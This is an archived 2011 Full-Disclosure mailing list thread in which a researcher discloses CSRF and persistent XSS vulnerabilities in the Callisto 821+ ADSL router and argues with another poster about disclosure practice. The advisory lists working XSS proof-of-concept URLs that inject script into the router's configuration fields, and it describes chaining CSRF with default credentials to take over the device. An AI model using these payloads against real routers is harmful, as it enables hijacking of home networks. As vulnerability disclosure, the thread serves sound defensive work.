[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <015d01cc5157$6874a020$9b7a6fd5@ml>
Date: Tue, 2 Aug 2011 23:58:52 +0300
From: "MustLive" <mustlive@...security.com.ua>
To: "-= Glowing Sex =-" <doomxd@...il.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Multiple CSRF and XSS vulnerabilities in ADSL
modem Callisto 821+
Hello 0xd0!
> So, you could maybe have to think if the router has port 80 open and i assume a remote-service
Yes, port 80 (and also 8008, as I wrote in my first advisory about Callisto 821+) is open, but it's accessible only from local - from local computer and LAN, and not from Internet (by default it's disabled). And all those hundreds of CSRF, XSS and DoS holes which I disclosed, without taking into account "unlimited" XSS and DoS holes, allow to bypass this limitation of disallowed remote access and to attack control panel from remote. Including it's possible to enable via CSRF a remote access from Internet to control panel and then by using default login and password (or if worry that user changed it, then make via CSRF a new user with specified login and password) log into control panel and take router under control.
About such "unlimited" vulnerabilities I wrote in article How to find billion of XSS vulnerabilities (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2010-November/007233.html).
> Luckily some isp's do protect your modem, as many are so it seems, coded weakly in the firmware area.
Developer of modem already protected (as they thought) their consumers by disallowing access from Internet by default. My ISP Ukrtelecom (already my ex ISP) didn't change this setting and also thought it was enough to protect clients. After in beginning of April I first time entered into control panel and found that it was full of CSRF holes (in addition to default login and password), I talked with Ukrtelecom's representative by phone.
And asked him why their company didn't change default login and password and not inform all their clients about control panel, the login and password for specific model of router (different models have differences and no documentation on routers was given to the clients), the fact that default login and password was used and not recommended clients to change it. And they answered that because by default access from Internet is disallowed, they though that everything is secure and their company (holemaking one - with multiple holes on multiple their web sites and in their Internet and telecommunication services, which I've informed them for last years) don't worry about their clients. And on my question about multiple CSRF which can remotely change any settings of modem, he didn't answer, because he don't know what it is. So attacks from local (from lamers or viruses at local computer or LAN) and attacks from Internet on logged in to control panel modem owner are possible and not considered as a threat at all by developer of the router and this ISP (similar situation can be with other ISPs).
> That is consumer value,and i assume the company has released a patch ?
No, company (Iskra) completely ignored these issues (and there are hundreds of holes in their router). They ignored as my first letter from 26th of May, as all other letters (24 letters in total during May - July about different vulnerabilities). Looks like they don't care about security of their products and of their clients. Similarly as ISP Ukrtelecom, which is Iskra's routers distributor in Ukraine (possibly only one ISP who distribute these routers) and which is also completely ignored security of their own sites, services, routers which they sell and of their clients.
So all consumers of Isrka modems should know the truth - the real situation with security of the routers of this company. I made my decision (after all these holes in Ukrtelecom and Iskra and their ignoring) - I no more using not their services, nor their modems. Besides, Iskra is funny company - from their official e-mails (mentioned at the site) service@ is not working at all, but e-marketing@ works, but they're not answering, not fixing, just ignoring, as I've already mentioned.
> why then disclose the thing, i guess you either go one way or the other, know what i mean ?
No I don't :-). But there are always reasons for disclosing vulnerabilities. And there are reasons in this particular case and they are obvious and mentioned in every my post about this router (besides worrying about security of the people which is by default in all my disclosures).
> but yea, nice stuff if xss is your thing. ;')
All these hundreds of CSRF, XSS and DoS holes in this router are nice by its own. And yes, there are all found by me. All these holes in Callisto 821+ (http://securityvulns.ru/news/ZTE/Callisto/821.html) (from 24 advisories 3APA3A forget to put two in July, so they are no listed in this list - I've already reminded him two times, so he'd fix it).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
----- Original Message -----
From: -= Glowing Sex =-
To: MustLive
Cc: full-disclosure@...ts.grok.org.uk
Sent: Saturday, July 30, 2011 1:42 AM
Subject: Re: [Full-disclosure] Multiple CSRF and XSS vulnerabilities in ADSL modem Callisto 821+
So... advanced...
So, you could maybe have to think if the router has port 80 open and i assume a remote-service,most isp's would have the port 80 remote-assist open for possibly helping a customer,I know that is the first thing i switch to 'off' ,and actually, my isp went thru that with me on install.
Luckily some isp's do protect your modem, as many are so it seems, coded weakly in the firmware area.
That is consumer value,and i assume the company has released a patch ? Usually, you would either contact a vendor and completely see-it-through,asin wait for theyre reply, I do not see this in the actual timeline, i only see that you have said your working 'with' them, and theyre CEO... why then disclose the thing, i guess you either go one way or the other, know what i mean ?
You should have a 2011-*-* - Vendor has now patched the issue regarding this , and possibly if it is serious, assigned a bid/cve.
I am only assuming what i see with other disclosure policies... but yea, nice stuff if xss is your thing. ;')
cheers
0xd0
On 30 July 2011 07:30, MustLive <mustlive@...security.com.ua> wrote:
Hello list!
After discussion with Michael Simpson about these vulnerabilities in
Callisto 821+, I want to warn you about new multiple security
vulnerabilities in ADSL modem Callisto 821+ (SI2000 Callisto821+ Router).
These are Cross-Site Request Forgery and Cross-Site Scripting
vulnerabilities. In April I've already drew attention of Ukrtelecom's
representative (and this modem was bough at Ukrtelecom) about multiple
vulnerabilities in this model of Callisto modems (and other models also
could be affected).
SecurityVulns ID: 11700.
-------------------------
Affected products:
-------------------------
Vulnerable is the next model: SI2000 Callisto821+ Router: X7821 Annex A
v1.0.0.0 / Argon 4x1 CSP v1.0 (ISOS 9.0) [4.3.4-5.1]. This model with other
firmware and also other models of Callisto also must be vulnerable.
----------
Details:
----------
These attacks should be conducted on modem owner, which is logged into
control panel. Taking into account that it's unlikely to catch him in this
state, then it's possible to use before-mentioned vulnerabilities
(http://websecurity.com.ua/5161/) for conducting of remote login (for
logining him into control panel). After that it's possible to conduct CSRF
or XSS attack.
CSRF (WASC-09):
Every connection in section LAN connections, as default, as other
connections, has advanced settings. Let's view on example of default
connection (iplan).
In section Edit connection in subsection Edit Ip Interface
(http://192.168.1.1/configuration/edit-form.html?ImRouter.ImIpInterfaces.iplan)
via CSRF it's possible to change settings (IP, Mask and others) of
connection.
In subsection Edit Tcp Mss Clamp
(http://192.168.1.1/configuration/edit-form.html?ImRouter.ImIpInterfaces.iplan.ImTcpMssClamp)
via CSRF it's possible to change settings of connection.
In subsection Edit Rip Versions
(http://192.168.1.1/configuration/edit-form.html?ImRouter.ImIpInterfaces.iplan.ImRipVersions)
via CSRF it's possible to change settings of connection.
In subsection Edit NAT
(http://192.168.1.1/configuration/edit-form.html?ImRouter.ImIpInterfaces.iplan.ImNatHelper)
via CSRF it's possible to change settings of connection.
XSS (WASC-08):
There are many persistent XSS vulnerabilities in above-mentioned four
subsections of section Edit connection.
In subsection Edit Ip Interface:
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3Aipaddr=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3Amask=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3Adhcp=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3Amtu=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3AsourceAddrValidation=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3AicmpRouterAdvertise=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3Aenabled=%3Cscript%3Ealert(document.cookie)%3C/script%3E
In subsections Edit Tcp Mss Clamp, Edit Rip Versions and Edit NAT the
situation is similar.
And also attacks via the names of parameters are possible (when XSS code is
setting in the name of parameter), which I wrote about earlier
(http://websecurity.com.ua/5277/).
In this case the code will be executed immediately, and also at visiting of
pages http://192.168.1.1/system/events.html and
http://192.168.1.1/shared/event_log_selection.html.
------------
Timeline:
------------
2011.04.14 - informed Ukrtelecom about multiple vulnerabilities in modems,
which they give (sell) to their clients.
2011.07.23 - disclosed at my site.
2011.07.24 - informed developers (Iskratel).
I mentioned about these vulnerabilities at my site
(http://websecurity.com.ua/5296/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists